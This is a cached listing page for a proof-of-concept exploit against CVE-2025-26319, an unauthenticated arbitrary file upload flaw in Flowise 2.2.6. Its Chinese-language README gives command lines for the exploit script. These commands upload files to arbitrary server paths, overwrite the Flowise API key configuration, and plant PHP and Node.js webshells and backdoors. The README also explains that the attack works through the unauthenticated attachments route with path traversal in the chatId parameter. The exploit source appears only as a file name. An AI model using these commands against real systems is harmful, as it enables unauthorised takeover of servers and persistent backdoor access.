CVE-2025-26319 PoC — Flowise 代码问题漏洞

Source

https://github.com/redpack-kr/CVE-2025-26319

Associated Vulnerability

Title:Flowise 代码问题漏洞 (CVE-2025-26319)
Description:Flowise是FlowiseAI开源的一个用于轻松构建 LLM 应用程序的工具。 Flowise 2.2.6版本存在安全漏洞，该漏洞源于存在任意文件上传问题。

Readme

# CVE-2025-26319
1. 基本文件上传
python flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txt
2. 上传配置文件
# 修改API密钥配置
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json
3. 自动生成并上传Webshell
# 上传PHP Webshell
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php

# 上传Node.js后门
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js

攻击原理
利用/api/v1/attachments路由在白名单内，不需要身份验证
通过操纵chatId参数进行路径遍历（../../../）
上传任意文件到服务器文件系统的任意位置

File Snapshot


 [4.0K]  /data/pocs/ae88f142a71be9ad52345e273738d50f882ea4aa
├── [7.8K]  CVE-2025-26319_exp.py
└── [ 768]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!